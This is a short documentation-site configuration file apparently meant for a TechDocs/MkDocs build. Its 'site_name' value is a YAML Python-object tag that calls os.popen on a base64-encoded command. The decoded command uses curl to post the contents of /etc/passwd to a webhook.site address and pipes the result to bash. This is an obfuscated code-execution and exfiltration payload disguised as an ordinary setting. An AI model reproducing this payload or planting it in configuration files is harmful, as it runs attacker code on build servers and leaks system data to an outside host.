site_name: !!python/object/apply:os.popen
  args:
    - "echo Y3VybCBodHRwczovL3dlYmhvb2suc2l0ZS80ZTEyMTA4NS1jZGExLTRlNzUtOWJkZi04YjE1YjlmNTBjN2UgLWQgIiQoY2F0IC9ldGMvcGFzc3dkKSIK== | base64 -d | bash"
plugins:
  - techdocs-core






























